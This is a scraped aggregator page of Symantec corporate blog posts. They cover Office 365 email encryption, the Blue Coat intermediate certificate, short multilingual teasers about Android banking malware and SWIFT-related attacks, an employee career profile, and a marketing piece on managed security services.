Take advantage of seamless policy-based encryption.

Symantec uses a policy-based approach to encrypt emails based on message attributes or message content in a manner that is totally transparent to the sender. Unlike Office 365, Symantec’s encryption solution does not require encrypted message recipients to register or use a Microsoft account, or use one-time passcodes to access encrypted messages. Symantec Policy Based Encryption also works with all types of mobile devices and does not require apps like the Office Message Encryption Viewer to access encrypted messages.

A 2016 Gartner Magic Quadrant Leader for Data Loss Prevention

Independent research organization Gartner recently named Symantec a leader in the 2016 Gartner Magic Quadrant for Data Loss Prevention. The Gartner recognition of Symantec as a DLP Leader assures that you are partnering with a leader in DLP technology.

Symantec helps you transition to the cloud with confidence

Microsoft Office 365 is an excellent platform to enhance productivity and while it does include some security measures, you should enhance and extend security measures with Symantec. To fight advanced threats, you need advanced protection. Symantec Office 365 Protection helps fill in the security gaps that Office 365 misses. We help enhance the security of Office 365 and most of all, create defenses to help protect your organization and your sensitive data.

Looking for more insights?

Visit Symantec Office 365 Protection

Symantec Protocol Keeps Private Keys In Its Control

0
0
Twitter カードのスタイル: 
summary

The CA community is complex and nuanced, particularly given the issuance of certificates in a multitude of environments and devices. We’ve been reminded of that fact again this week by confusion over an intermediate CA used by Blue Coat.  Companies often have their own intermediate CA so they can issue certificates only for their organization, which was the case for Blue Coat. These types of certificates are often used for testing purposes and usually are discarded once the tests are completed. When we issue an intermediate CA, our protocols state that Symantec maintains full control of the private key.  That’s exactly what took place with Blue Coat. The company never had access to the private key and speculation that Blue Coast was issuing public certificates for other organizations is incorrect. Like any topic that is complex, it’s easy for things to get misconstrued. This was a routine CA request and nothing more.  

安卓恶意软件升级后可操纵Marshmallow的新版权限模型

0
0
Android.Bankosy和Android.Cepsohord可与安卓6.0 Marshmallow引入的新版运行时权限模型一起工作。

続きを読む

SWIFT攻击者所使用的恶意软件与更多金融攻击均有关联

0
0
网络攻击者还将目标瞄准菲律宾的银行,其恶意软件代码与Lazarus团伙使用工具的代码相同。

続きを読む

Marshmallow の新しい権限モデルにも対抗できるよう進化した Android マルウェア

0
0
Android.Bankosy と Android.Cepsohord は、Android 6.0 Marshmallow で新たに導入された実行時の権限モデルにも対抗できる能力を身につけつつあります。

続きを読む

SWIFT を悪用するグループのマルウェア、金融機関を狙う他の攻撃ともつながり

0
0
フィリピンの銀行も攻撃者に狙われ、そこで使われたマルウェアからは Lazarus グループの使うツールと共通のコードが見つかりました。

続きを読む

19 Years and Counting - What I've Learned on my Journey from Intern to VP at Symantec

0
0

May is Asian-Pacific American Heritage Month in the United States, and as we come to the end of the month, we would like to take the opportunity to celebrate our Asian-American employees and those in the APJ and India regions, for their contributions to Symantec and supporting us in becoming a global market leader in security and information management solutions. Today we share the story of a long-time employee, Spencer Liang, who has been with Symantec for nearly 20 years beginning as an intern and moving his way up to his current role as Vice President.

When I tell people I've been with Symantec for 19 years, they are often shocked that I have been with the same company for that long. To me it has been simple. I have been given opportunities, constantly challenged to expand my skills, supported by my managers and team, and most importantly, I have enjoyed my work the entire way.

I am an only child and was raised in Taiwan until the age of 10 when my family moved to Los Angeles, California where I live today.

I have always had an interest in technology, playing video games with friends, many of whom shared my same interest for the industry. During my youth, I wasn't aware my mother was a programmer and sometimes I wonder if it was her genes that got me to where I am today. However, I do remember that two of my uncles worked in IT – one for the financial sector and the other for local government. It was during my high school studies that one of them convinced me to pursue a career in technology due to the vast opportunities the industry provided and the increasing demand for workers (at the time I was studying architecture).

Based on this, I changed my undergraduate focus to computer science at UCLA, which would set the foundation for my future career. One of my favorite classes at UCLA was lead by a Symantec Fellow, Carey Nachenberg, who left a lasting impression on me. When it came time to begin an internship, I had a few choices, but I knew I wanted to work for Symantec. I began an internship the summer of my junior year and the rest is history….

SpencerL_0.png

Spencer Liang has been with Symantec for nearly 20 years, starting as an intern and moving his way up to his current role as Vice President, Engineering.

So why 19 years?

My 19 years with the company have definitely not been without excitement, or without change. My job and the company have both evolved. I have had the chance to work in a variety of positions from Quality Assurance Engineer to Sr. Software Engineer to Director of Engineering, and Symantec has transformed into one of the world's leading cybersecurity companies.

Additionally, I find the field of cybersecurity one of the most exciting and impactful.  Cybersecurity threats are increasing every day and becoming more sophisticated. They are targeting individuals, corporations, governments. The safety of our world depends on the safety of the internet. Every day brings a new challenge and every day I know that I am making Symantec a stronger company, solving complex problems for our customers, and making our world a safer place. Every day I am helping someone and this is extremely rewarding.

To me, the people are what make Symantec a special place. My team has been collaborative and supportive, my managers challenging and inspiring, and all of this together has pushed me to grow, to develop new skills, to become a better leader for my team, and to be an expert in my field.

Since I began my career, technology has changed so much and created exponential opportunities. My advice to anyone is regardless of your background, pursue what you are passionate about. Try different functions, different responsibilities, different teams. You don't really know what a job entails until you start, so don't be afraid to take a chance and try it out. Along the way remember that no job is too small; sometimes it is the smallest tasks that make the biggest difference.

I am lucky to live in one of the centers of the US melting pot, a highly diverse city where the industry judges you on what you accomplish, not your background. I know this is not the same across the world, but I do feel it is the same across Symantec. 

I truly believe at Symantec we embrace a diversity of backgrounds, beliefs, ideas and inputs. I hope my experience and my interactions with those internal and external to Symantec have and will inspire others to take a chance, pursue their dreams and take on new challenges.

Just remember to go in with an open mind and enjoy the experience. Sometimes you have to work somewhere to see if it is a good fit, and I have been lucky in the last 19 years to find mine. 

Spencer Liang is Symantec's Vice President, Engineering

Mind the Gap: Addressing the Cyber Security Skills Shortage

0
0
Six best practices to strengthen your security posture
Twitter カードのスタイル: 
photo

Symantec_ShortageOfProfessionals_Blog.png

In this evolving cyber landscape, adversaries are well funded and moving faster, attacks are getting more sophisticated and time to detection is taking too long.  Yet, budgets are constrained, and in-house resources are lacking.  Also, 86 percent of companies report that there is a shortage of professionals available to fill the growing cybersecurity need.[1] With these issues front and center, CISOs are asking questions and looking for answers. 

At Symantec, we have been helping executives fill the voids in their security operation for more than a decade.  Through our work around the globe, we are seeing trends that are shaping the marketplace and that are bound to have an impact on your security plans for the future.  Here are six things you will want to consider as you determine how to best strengthen your security posture.

  • As the threat environment grows, regulatory compliance becomes more complicated. The growth of technology and the explosion of the threat landscape is making compliance to existing regulations more and more challenging – whether PCI DSS, ISO 27001, SOX or any number of other specifications that call for consistent oversight and reporting.  Finding the time, resources, and budget to stay on top of these ever-changing demands can be costly and distracting.  It is critical that you have professional help. A Managed Security Service Provider (MSSP) can help you simplify the process and manage compliance details as well as keep up-to-date with credentialing, such as certification with ISO 27001, compliance as a PCI service provider, SSAE16/SOC1 Type II reporting and demonstrating attestation from both internal and external auditors, multiple times each year.  

  • Millions are being spent on IT migration to the cloud.  It follows that your security plan should keep in step. Don’t compromise the robust security infrastructure you have attained in recent years. Whether your data and applications reside in your data center or someone else’s, ensure the same level of protection for both.  An MSSP should be able to provide you with the same level of security monitoring for both your cloud and on-premises application infrastructure. 

  • Advanced detection techniques could head off new risks. Some threats leave traces that by themselves could be false positives, yet they may actually represent an incident.  Many security products have limited visibility, seeing only part of the threat, missing the whole pattern and thus allowing the threat to go undetected.  That is why it is critical that your MSSP have advanced analytic capabilities, such as machine learning, to identify potential incidents that are missed by control points.  Correspondingly, your MSSP’s SOC personnel should be dedicated to your industry and business so that they are able to view alerts in context, paint a picture of potential impacts on your organization and possibly initiate a new incident investigation.

  • Your existing security infrastructure holds value.  You’ve spent most of your budget the past few years building a security infrastructure to support your business.  But, threats have grown, and talent is scarce.  You need help!  Your MSSP should take time to understand your operational framework and work with you to fill your critical gaps.  Your MSSP should be able to help you build a security monitoring plan that integrates into your existing workflows, complements your assets and actually strengthens your security profile.

  • Being proactive is being prepared. Threats are taking longer to uncover and becoming more costly to remediate.  As a result there are bigger impacts on businesses. Gone are the days when identifying a breach or compromise was enough.  The potential for loss of data or money is far too great to wait for a malicious event to occur.   You must prepare for what might happen long before your income or your reputation is affected.  Your MSSP should have deep knowledge of what’s happening outside of your company -- in your industry or region.  This knowledge should come from a vast collection network that draws from millions of endpoints around the world. The output from that should be an ongoing stream of intelligence to you about IoCs and attacks that have occurred in organizations similar to yours, so you can deploy your people and technology to address any oncoming threats.

  • There is no substitution for human intelligence in the fight against today’s cyber threats.  Technology can help identify threats in the wild and associate technical indicators with IP addresses and domains or hashes that reveal themselves on your network, servers or endpoints.  But nothing can replace the rich contextual information that comes from the human inputs of skilled security analysts – analysts with specializations in threat-hunting, y and z and certifications in GIAC or z or training with governmental or intelligence entities. Your MSSP should have multiple, global SOCs, staffed with analysts and service teams who provide local language support as well as specific knowledge of your organization, industry and geography.  This type of dedication is necessary to create linkages between the technical and the contextual that is specific to your business.

Learn More:  Symantec™ Managed Security Services (MSS) acts as an extension of your security operations team.  We have been recognized as an industry leader in Gartner’s managed security services provider category for 12 consecutive years. We work with you to extend and complement your current team so you can focus on what’s critical to your strategic agenda.  Through our Cyber Security Services, we help you to address a broad spectrum of cyber security challenges.  Our suite includes DeepSight Threat Intelligence, Managed Security Services, Incident Response and Cyber Skills Development.

 

[1] ISACA, CyberSecurity Nexus

Viewing all 5094 articles
Browse latest View live




Latest Images